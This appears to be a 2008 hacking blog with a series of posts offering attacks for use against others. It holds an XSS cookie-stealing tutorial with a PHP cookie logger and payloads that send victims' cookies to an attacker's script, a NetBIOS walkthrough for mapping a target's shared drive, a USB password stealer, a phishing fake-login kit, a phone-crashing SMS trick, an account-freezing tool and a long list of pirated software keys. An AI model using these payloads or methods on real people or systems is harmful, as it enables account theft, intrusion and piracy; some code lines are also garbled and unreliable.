Cookie Stealing

Posted in Snarfing with tags cookie snarf, how to steal cookies on August 12, 2008 by hacktocrack

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting). Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code: Code: jalert(document.cookie) After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an example of what might be in your cookie: Code: username=CyberPhreak; password=ilikepie This is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough. Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This Is the process of cookiestealing. Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies: Code: <?php $cookie=$_GET['cookie']; $log=fopen(”log.txt”,“a”); fwrite($log,$cookie.”\n”); fclose($log); ?>

And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example: Code: is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer. Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing. Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script: Code: <script> document.location=‘’+document.cookie; </script> Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page. But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough: Code: <ahref=”jvoid(document.location=’’+ document.cookie)”>Click Me</a>

In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.

Restart your friend’s phone using sms
Posted in hacking, offline hacking with tags hack phone with sms, how to restart phone, how to restart phone using sms, restart phone on August 4, 2008 by hacktocrack

Here is a new trick to restart ur friends mobile via sms with this trick only 1110,1110i,1112,1100,2100 can be restarted. just type ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, or 79 inverted commas in text msg and send it to ur friend having cells mention above and see wat happens.

Exploit SQL Server System
Posted in Hardcore Hacking, Website hacks, hacking with tags hack sql, sql, sql hack, sql hacking, sql injection, sql server system on August 4, 2008 by hacktocrack

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server. 1. Direct connections via the Internet These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect. 3. Enumerating the SQL Server Resolution Service Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434. 4. Cracking SA passwords Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability. 5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole. 6. SQL injection SQL injection attacks are executed via front-end Web applications that don’t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually — if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process. 7. Blind SQL injection These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn’t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing. 8. Reverse engineering the system The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse engineering ploys. 9. Google hacks Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors — such as “Incorrect syntax near” — leaking from publicly accessible systems. Several Google queries are available at Johnny Long’s Google Hacking

Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth. 10. Perusing Web site source code Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

NetBios Hacking
Posted in hacking, offline hacking with tags hack netbios, hacking netbios, how to hack netbios, netbios, netbios hacking, what is netbios on August 2, 2008 by hacktocrack

For this tutorial, I used Microsoft’s Windows XP Home Edition OS What is it? NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers. How can this be of useful to me? Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal. What do I need? Windows OS Cain and Abel CODE ( ————– So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local

subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.

Part2, Trial and Error Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):

IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

Part3,GatheringtheInformation. Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it. The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP. The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into. The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below

BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup Step4,BreakingIn ———————————————————————————————– Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)” An example for this tutorial would be: “net view \\”

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive. All’s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G…,” for a different target.

As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations!You’reDONE! But, before you leave, please look over some of this information for further help and just for thanks to me. -Commands used in this tutorial: PING NBTSTAT -a (IP Address of Target) NET VIEW \\(IP Address of Target) NET USE K: \\(IP Address of Target)\(SHARENAME) 4 Comments »

Game CD Keys
Posted in Uncategorized with tags cd keys, download keygen, game cd keys, keygen, software cd keys on August 2, 2008 by hacktocrack

1503 A.D. The New World serial: 0705-7933859-6725970-0015 Age Of Mythology br Serial: P3HM4-WDM27-662XW-9BPTV-CFVMQ Al Qaeda Hunting 3D serial: 23822 Back and White Br serial : 0901-3324366-4702210-2081 Battlefield 1942 Serial : 5000-0000000-0000000-1318 Battlefield 1942: Secret Weapons of WWII: 2gyy-3wlk-8btf-wjur-g277 Battlefield Vietnam: V2W6-54VJ-9R11-XJPV-79CM Battlefield 2: TW99-NWBV-0PVZ-EAEI-JVTL BLACK & WHITE BR - 0901-3324366-4702210-2081 Black & White: Creature Isle serial: 1740-9488245-5171152-1858 Chrome (c) Take 2: XTITY-92Y9L-MGPVA-KJ4Z6 CLIVE BARKER’S UNDYING - 2500-0911911-0911911-2705 Comanche 4 serial: 3s2d-flt1-cls2-rule-7865 Command & Conquer Generals: Zero Hour Expansion: ULPF-ZEVK-FRWG-Q4YJ-6F2T Command & Conquer: Renegade serial: 056894-929488-118387-9679 COMMAND E CONQUER GENERALS SERIAL: 4963-7882913-5984076-0674 Copa do Mundo FIFA 2002 BR SERIAL: 5500-5827167-6713862-1708 Dark Reign 2 CD Key : GAR3-RAB8-FUP9-NYZ7-2832 Dead Man’s Hand S/N: DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K Delta Force 3: Land Warrior - s/n: N5E3-YXH2-G983-9WYB-B3ZS Delta Force 4: Task Force Dagger serial: 72YL-R4SB-GKG6-3WKS-HQ27 Delta Force 5 Black Hawk Down serial: QF7S-HZMK-XLXP-CUJN-HDTZ Delta Force Black Hawk Down: Team Sabre (Expansão) Delta Force Xtreme: DFX-WESTIL-LKICKY-DULASS-ANYDAY Serial: AV4E-YVQE-NACM-DD3M-KBW3 DELTA FORCE: LAND WARRIOR - N33G-6HM2-9Y8F-HD4U-M7S9 Devastation_CDKEY: 5B36F-976AA-6A471-58B8D-92B7B

DOOM 3 CD Key: VB44-6BWV-H6UZ-RRPE-5E Dominius II Serial: 1111-1111-1111-064 Earth 2150 : Lost Souls Serial : 7XJC-UD2E-E83L-Z5T5 Emperor: Rise of the Middle Kingdom Serial : BAC9-RAL8-SAS2-SAX2-9999 Empire Earth: Art of Conquest Serial : GER2-MAN2-RAP2-PER5-2252 F1 2002 SERIAL: 7931-9865028-6024865-1156 F1 champiship season 2000 serial: 2000-5005241-5005241-6839 FA_Premier_League_Manager_2002: 4507-1863659-3033569-5650 FIFA 2003 BR: BL7G-929A-2YXE-UFZZ FIFA SOCCER 06: ON99-FLZU-9DEV-WTFM-6DEV Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS FREEDOM FORCE: 1439-8808778-3837107-2854 Frontline Attack - War over Europe SERIAL: FUBP-EYNZ-KFXC-SKM2 Galactic Civilizations With Bonus serial: DN-500792-GC1-CLS4FLT8XT GLOBAL OPERATIONS: 5000-0000000-0000000-5021 Ground Control Serial : RAC2-RAL2-CAS3-RAD3-3542 half life couter strike serial: 2462-92319-7642 half life edição especial:UCF1840810021327 half life opposing force serial: 2708-43011-3332 ou UCF1840810021327 HALF LIFE: UCF1840810021327 HALF-LIFE - 2420-92220-4482 HALF-LIFE: COUNTER-STRIKE - 2462-92319-7642 HARRY POTTER : 0901-7014788-4117807-0206 Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV HARY POTER E A CAMERA SECRETA SERIAL: 7954-3123341-1387427-3052 Heli Heroes - serial: 8bnk-c9eh-63hb-kj88 Hidden and Dangerous 2: 1234-5678-9abc-dddf Homeworld 2 (c) SIERRA: NAS3-DEC2-BYJ5-CUJ6-8385 homeworld: BAB2-BAB2-CEZ8-TAC3-9978 Hoyle_Majestic Chess: XYN6-NAB4-FES2-MUX7-3485 IGI 2 COVERT STRIKE SERIAL: 031F-F8D0-6536-B510 James Bond 007: NightFire Serial : 1740-9488245-5171152-5578 Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537 Kelly Slater Pro Surfer Serial: 0f162xa28pg34dhc Kingdom Under Fire Gold Edition serials: E3VI FP69 HT79 5KVG Lego Soccer Mania serial: 1500-0776239-9370523-4726 madden nfl 2001: 1500-6610360-1643530-0243 Madden NFL 2004: VMZ9-JXRC-AZOR-J000-1911 Madden_NFL_2002_ CDKEY enter: 0901-5445152-2745753-4827 Medal Of Honor Allied Assault Breakthrough: L5KB-32WY-B6G5-6747-YQ49 Medal of Honor: Allied Assault CD Key, enter 5000-0000000-0000000-5068 MEDAL OF HONNOR: ALLIED ASSAULTKey: 7931-9865028-6024865-9663 Microsoft Flight Simulator 2002 - Airport 2002 Volume 1serial use:

A221-A24AABAA-FDBA5DD9 Moto Racer 3: 54e9-a751-1da8-e109-efb3-51f9-d90f-75d02250 MVP Baseball 2003 CD Key: JNXC-PAPN-KR96-MY5P nascar 2002 SERIAL: RAF2-RAL2-RAS2-RAX2-6667 NASCAR RACING 4 - GAC7 REB8 TUX6 DAC2 7833 Nascar Thunder 2003 serial: NASC-ARTH-UNDE-RJAM Nascar Thunder 2004: CLZH-PE48-R9RR-G9ZT-9DSW NBA LIVE 2001 - 2001-0020601-0010978-6694 NBA Live 2001 CD Key: 2001-0020601-0010978-6694 NEED FOR SPEED 2003: HOT PURSUIT 2 serial: 8249-7EE3-84EW-TXGT Need For Speed: Underground s/n: SQZZ-2Y44-8AS4-7QSQ-YDEV Neverwinter Nights serial QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPERDJTG NHL 2002: 1000-2003004-0000000-4904 NHL 2004: 6T22-8L62-6666-8666-6666 O.R.B:SERIAL: JTRV74NVVKUJX7AM Operation Flashpoint Gold Upgrade Red Hammer serial M3CZ P5186 XNEYL CL0T7 513NT OUT LIVE BR: c9523c-1a4466-237cb8-dc7e67 Pro Evolution Soccer 5: NXUD-PACV-EM2X-KPC9-6AYU QUAKE III Arena - THWT37AB3P7JBTPC QUAKE III Team Arena - TSBH 7CCG DPWP B2LT 84 QUAKE IV: 9TFP-TXCG-XFMM-XXR9-9DGT Return to Castle Wolfenstein CD Key: CLAL-A7WJ-DTSJ-WARP-88 Rise of Nations:RXVC3-B3347-DVG9X-FTFQF-9M7XT Roller Coaster Tycoon 3 serial: RLDU-M24D-83CX-C8LZ-WDHS-ETND S.W.A.T. 3 - Elite Edition - TED4-SAB4-DUB7-CYJ2-8652 Sacrifice serial: xxxx-xxxx-xxxx-xxxx Sail Simulator 4.2 Serial : SS42-V7CGQ-9BCGM-4C326-JW25C Savage: The Battle for Newerth: LB42-Z05V-VK9S-I7BM-58S5 Sega GT Serial : GTJ08010-322007-01723 Serial do Tiger: 1500-3202255-2068109-2932 Shogun 2: CDKEYS = 0901-3721384-6427058-7026 Shogun Total War Serial : 1600-0052410-0052410-6424 SIM CITY 3000 UNLIMITED BR - 5001-9781634-6520278-1000 Sim City 4 Rush Hour *MULTI*: CLC4-5ZU8-6C4S-9W46-LS4E simcity 4 serial: GRUS-4528-8217-1ULF Simcoaster serial : 2001-0013101-0010978-2823 SIMGOLF: 5000-0000000-0000000-5071 SOLDIER OF FORTUNE 2: 3Z4J - J3PP - K848 - EWPK - 1F SOLDIER OF FORTUNE GOLD - BEN6-MUC8-BEZ6-BUJ6-3764 Spell Force: 08AFX-CGGML-W260D-5RRP0-CVNFD Spy Hunter Serial: SHU3E7RVCCRBFHSS

Star Trek Elite Force 2 - TFAK-7WCH-44RH-YJ7X-F9E9 Star Trek StarFleet Command : Orion Pirates Serial : 4008-B491-1DC3-0F6C starfleet command 3 serial: 0000-0000-0000-K28K STARTRECK: RYS8-LAB4-JEF8-BYM3-4652 Sub Command: Seawolf-Akula CDKEY: 0901-1315206-2102812-3248 SUPERBIKE 2001 - 1500-4288423-2982915-3163 Team Factor SERIAL: 2NKZYY9-2SKAKSC Terminator 3: Rise of the Machines Serial: TTDA-H8VW-KJDV-NNKA THE SIMS BR - 100486-585530-905808-0928 THE SIMS DELUXE BR SERIAL: 5500-5782961-4067120-2138 5500-7457886-5179416-4991 throne of darkness serial : RAC2-RAD2-RAC2-RAC2-3387 Tiger Woods PGA Tour 2002 serial: 5000-0000000-0000000-5045 TIGER WOODS PGA TOUR 2003 SERIAL: FLTR-0825-9192-1RLC Tony Hawks Pro Skater 4: P4EPBTIQDAIH7WXM Total Club Manager 2003 serial : 1500127097911060657818 Train Simulator - The Activities Serial: 6850-YV6AYS6B Trainz serial, enter: RAZO-R9XI-XXXC-XXXT-XXGX-1911 Tron 2.0 (c) Disney Interactive: 9393-L9CN-PRTB-T7N4-5858 Universal Combat Serial: 2B46-97F6-OF33-99BB “Atenção o O podera ser um 0″ Unreal Tournament 2003 Serial : LYR22-RZ743-A9D7T-CNNEN War! Age of Imperialism: 1101-8603-2629-7418 Lord of the Rings: War of the Ring: XUF5-JUB2-JAB8-JUD3-4947 Lord Of The Rings The Return Of The King: s/n: TMXF-Q23L-LCEG-Y9WW-V94G Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV MSEE-5EL4-WYBB-DGLU-GDEV 6Q7F-WAAC-8QTH-WLC4-EDEV Q3N6-2X4N-A4EA-NY64-GDEV GJGQ-4SLL-EA4Y-FJSU-UDEV 5LM5-M22H-45YT-W88Z-2DEV C6U4-7A49-4CE2-MUGL-8DEV BH4U-GCNX-WMJ8-ZGKY-4DEV KAU4-AVFV-34AK-782Y-4DEV Y3QQ-TUGW-4NU4-ZG68-6DEV Hidden and Dangerous 2: 1234-5678-9abc-dddf Pinnacle Instant Video Album V1.01 Multilanguage: 7777777777 The Sims Num Passe de Magica: U9BK-8XSP-YAG4-WYL4-SDEV PSB3-DLW5-3GPV-P8BU-HDEV Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537 CIVIL 3D V2004: 400-00000000 War! Age of Imperialism: 1101-8603-2629-7418

Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS Cakewalk MediaWorks Serial: CWMW1.00-009968 Neato MediaFace Serial: 7135be-1339bd-1a33-5c670 NHL 2004: 6T22-8L62-6666-8666-6666 FQ22-BXTP-FLT!-ELT!-FLT! CHYQ-AVKH-CRKD-GRKD-CRKD BZ8G-WCOL-L8JD-SUXM-LTBV A75V-8YSW-JQ75-NE79-LC4W ZZGY-JQVB-PJ4T-6K6K-4INY B233-BN2E-BUL3-87C5-4YZA AWZH-HVNV-P8FK-XHPQ-8EUJ J4LL-PZID-QZEM-RPQ2-UHRF RKRR-R3C4-QWP8-QUXI-96KC 1 Comment »

Cloning Hard Drives
Posted in hacking with tags clone hard drive, cloning hard drives, hack, hacking, hacking tips and tricks, how to clone hard drive on August 2, 2008 by hacktocrack

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem. Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to. First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag. Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag. Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button. Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”. Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the “Start” button, then click on the “Run…” button, then place the following into the Runbox: “XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button. If you receive an error message, then remove the space from between XCOPY and C:\ Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out. This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it. 2 Comments »

USB Password Stealer
Posted in Easy Hacking, Password Hacking, hacking, offline hacking with tags hack passwords, hack windows password, hack xp, hack xp password, licence stealer, password hacker, Password Hacking, steal passwords, steal usb passwords, usb hacking, usb hacks, usb password stealer, usb theif, usbtheif, xp hacks on July 30, 2008 by hacktocrack

Tweaked USB that steals every passwords including licences. Instructions 1.Decompress the archive and put all the files located in the folder “USBThief”into a USB. 2.Insert the USB in your victim’s computer. 3.View folder “dump” to see the passwords. Download Password: 3 Comments »

Protect yourself from fake login pages
Posted in Password Hacking with tags fake login pages, hacking, hacking tips, how to make fake login pages, how to phish, learn how to phish, login phishing, phishing, protect yourself from phishing on July 26, 2008 by hacktocrack

Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc … This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip. Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars. What goes on behind when you enter your login details in login form?? When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page. What an hacker does?? A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page. How to identify fake login page traps ?? 1. Never enter you login details in unknown sites. 2. Always type the address directly in to the browser. 3. Do not follows the links you get in mails and chatting even if they are from your friends 4. Always have a keen look in the address bar and verify if the address is correct. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap. 5. Please do report to the hosting site or the original site owner when you find a fake login page. 6. If you feel like you entered your details in a fake login page change your password immediatley. Now let’s go on with the trick..

You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page. Check that text file to get the passwords you wanted. Here is the demo of the trick Note:Don’t enter your actual password click this link to view the fake login page of yahoo The password you entered is saved into this page 1 Comment »

Hacktocrack Is Back Online!
Posted in Uncategorized on July 26, 2008 by hacktocrack

Hey Everyone This Blog Had Been Suspended For A Few Months. I finally hacked my own blog to unsuspend it.. I have no Idea if this site might get suspended again.. but anyways I will try to keep it for as long as possible… I have to Moderate over 400 comments Now lol. Will Start Posting again soon… Hacktocrack has an official site at check it out! Leave A Comment »

Create Folders And Files With NO! Name
Posted in Easy Hacking, Notepad Tricks, Other, hacking tips, offline hacking with tags create file with no name, create folder with no name, Create Folders And Files With NO! Name, free tips, hacking, hacking tips, hacking tricks on April 5, 2008 by hacktocrack

This trick will allow you to create files and folders without any name. Just follow the following steps: 1.Select any file or folder. 2.Right click on it, press rename or simply press F2. 3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad. Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys. 4.Press Enter and the nameless file or folder will be created. Reason: The file or folder that seems nameless is actually named with a single space. But what if you want to create another nameless file or folder in the same directory ? For this you will have to rename the file with 2 spaces. Just follow these steps below: 1.Select file, press F2. 2.Hold alt key and type 0160 from the numpad. 3.Release the alt key. Now without doing anything else, again hold alt key and press 0160. 4.Press enter and you will have second nameless file in the same directory. 5.Repeat step 3 to create as many nameless files or folders in the same directory. (we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.) 8 Comments »

Ice Cold Reloaded
Posted in Easy Hacking, Email, Hotmail with tags hack hotmail, hack msn hotmail, how to hack, how to hack hotmail, msn freezer on April 5, 2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.

Download Link 12 Comments »

Test - Hack Into this page
Posted in Password Hacking, hacking, hacking websites with tags hack into page, hack websites, hacking, how to hack websites, Password Hacking, website hacking on April 5, 2008 by hacktocrack

A Test to see if You are Really A Hacker Hack This Page Very Simple. Leave A Comment On The Page To Let Me Know If You Have Hacked It 22 Comments »

Find IP info using Gmail/Yahoo/Hotmail
Posted in IP tools, Website hacks with tags Find IP, Find IP info, Find IP info using Gmail, Find IP info using Gmail/Hotmail, Find IP info using Gmail/Yahoo, Find IP info using Gmail/Yahoo/Hotmail, Find IP info using Hotmail, Find IP info using Yahoo, Find IP info using Yahoo/Hotmail on April 4, 2008 by hacktocrack

When you recieve an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [] Finding IP address in Gmail 1. Log into your Gmail account with your username and password. 2. Open the mail. 3. To display the email headers,

Click on the inverted triangle beside Reply. Select Show Orginal.

4. manually find the IP address, proceed to 5. 5. Look for Received: from followed by the IP address between square brackets [ ].

